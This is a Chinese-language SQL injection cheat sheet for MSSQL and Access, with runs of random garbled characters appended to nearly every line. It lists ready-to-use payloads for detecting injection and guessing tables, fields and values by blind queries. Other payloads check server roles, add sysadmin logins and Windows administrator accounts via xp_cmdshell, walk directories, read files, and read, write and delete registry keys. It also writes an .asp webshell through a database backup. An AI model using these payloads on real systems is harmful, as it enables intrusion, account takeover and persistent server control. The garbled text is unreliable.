1.判断是否有注入;and 1=1 ;and 1=2 -SfU.XlZl
2.初步判断是否是mssql ;and user>0 j@w1�S[v�t
L|}s Z\2!�
3.注入参数是字符'and [查询条件] and ''=' �[��[�w� |
3<xDxj��0<
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��>x3lA�0m
B^]PKjL�NZ
5.判断数据库系统 ;TS%e[lFhQ
Z�x��hbnl6
;and (select count(*) from sysobjects)>0 mssql YaL:��6[6�
OSc�q�f�]H
;and (select count(*) from msysobjects)>0 access s2G��F*��{
�(KwC,�0�p
=Xg/[�J%��
�0:�>hK\F#
6.猜数据库 ;and (select Count(*) from [数据库名])>0 X:I2wJDs\�
�
jr�_z
�?
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 f�0j]��!g�
"*.N�'�J\�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 }r!�+wp� �
t=xE�UOQAn
9.(1)猜字段的ascii值(access) qTN%9!0�@9
9(nq 4�HvI
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 cs�?W��E9N
��1_#�;+S
(2)猜字段的ascii值(mssql) �E1t�CY.N{
dq`{f�qG�l
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �8e3���e�Q
K!.t�}s.�t
10.测试权限结构(mssql) q�*|Alr��m
EFl�j�UT?&
�K5�|~i�W'
>Q!�}tbg~9
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- H�ZZZ �[km
=*j�F��a�j
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �""XAU�xo�
^�=n���7�E
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �Q$:Q6�/5.
J{�-`&I�'b
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
�7s#��8-i
oI[���rxr
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- xVbRC�u�#Z
1:<(Q�2X%�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �r��hy�-o?
1�6Jq*�hKU
;and 1=(select IS_MEMBER('db_owner'));-- 5lJL��[{�
^/#�G,MxNy
N�0-�J�=2
N0Y4m�_dm*
11.添加mssql和系统的帐户 y.J>}[\&x�
7U_ob"`JV�
;exec master.dbo.sp_addlogin username;-- V�XWV �Pj#
;exec master.dbo.sp_password null,username,password;-- �,L��N^Zx*
�V�Q|�{Q}�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- %)�,u0:go�
;nP��(S`'�
;exec master.dbo.xp_cmdshell 'net user username password �5cinI^x)f
:;yrYAyT�3
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- }O>1t�a�uI
j�&_>_*.�y
;exec master.dbo.xp_cmdshell 'net user username password /add';-- }���`�Ya;�
�r�U��&Y/�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �P1T�{5u!T
pR9�3T+X��
�nEd�
"~
8�K-��P]�]
12.(1)遍历目录 2Kz$y
�JTp
!ess.U&m'�
;create table dirs(paths varchar(100), id int) f"P866@oWn
#�jrl�Ng4(
;insert dirs exec master.dbo.xp_dirtree 'c:\' (C��#�0
ML
>MN�"87U6�
;and (select top 1 paths from dirs)>0 ;Vat\,45pg
JJ
?'<)�EF
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) e4SS�'0|��
�x�xvt�<�J
4S�~�kNp�$
o]�Ne|PEpO
(2)遍历目录 Y;_F�,4��H
P.@�dB�.Ny
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �7T�dx*1 U
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �?x&}ammid
jIT|�K�k&]
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 q�e{�;E�H*
0VtjVz*C7&
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �Q|��h$�D~
Cm)�TFh6
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 n19�A>�,�m
GH��d1�?$�
{�+hABus�q
.�=J- !�{z
13.mssql中的存储过程 $V�!.z%Vgf
452k�E@=49
xp_regenumvalues 注册表根键, 子键 LdG?�kbJ&y
q��X5>[qf-
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 [YUL�vWA�J
H
Eq{TUTr
xp_regread 根键,子键,键值名 ;9m�RumLG"
�UT�KyPCfj
;exec xp_regread �z�HZfp_I�
vw;a�L�#PP
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 c�,�.@Cc2�
G6zFQ\&f��
xp_regwrite 根键,子键, 值名, 值类型, 值 ^C��~�Ryw7
U@y�)x+:�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 qzb�W0AM[M
$�.4A�?,d�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �\ opM}q�Z
e[u�}�V��f
xp_regdeletevalue 根键,子键,值名 bKM�*4M=k�
C0N}B1-�MU
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 O[t?*m1�/�
}k-8PG� �=
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 E#:!&{�O��
=�EFh*�s�p
�/Tm+&�J�d
2A~o)�7JaZ
14.mssql的backup创建webshell \]f+{d-�&
���6�_KvS�
use model {:�!�>Y1w>
TU^�ZvAO&�
create table cmd(str image); l���1k&@1"
tUx��H�6IS
insert into cmd(str) values (''); �\XV8t|*��
�/Q(bo�Y{�
backup database model to disk='c:\l.asp'; %AA&�n�*�m
]b%U9hmL^f
ZN��$%\,<�
b`�D]L/}pr
15.mssql内置函数 v:4j�3�J$z
; >�H1�A��
;and (select @@version)>0 获得Windows的版本号 d-1D�:Hs?�
Z3{1`"\<K
;and user_name()='dbo' 判断当前系统的连接用户是不是sa XJeWhk3R9
�ptT-{v�G�
;and (select user_name())>0 爆当前系统的连接用户 :�Q(�" �
Ue�9Y+'-x
;and (select db_name())>0 得到当前连接的数据库 _-y�1>{]H�
�we�`�BqZV
SXqB<j$�.;
?g4Rk9<!i
16.简洁的webshell �V�/2N�Ih
'[liZC���g
use model Cd�RJ�@�Lf
�?s�$d("~
create table cmd(str image); �G�xD`M��2
�-V6c�aVlg
insert into cmd(str) values (''); [%bGs1U���
��O�gIRI8L
backup database model to disk='g:\wwwtest\l.asp';
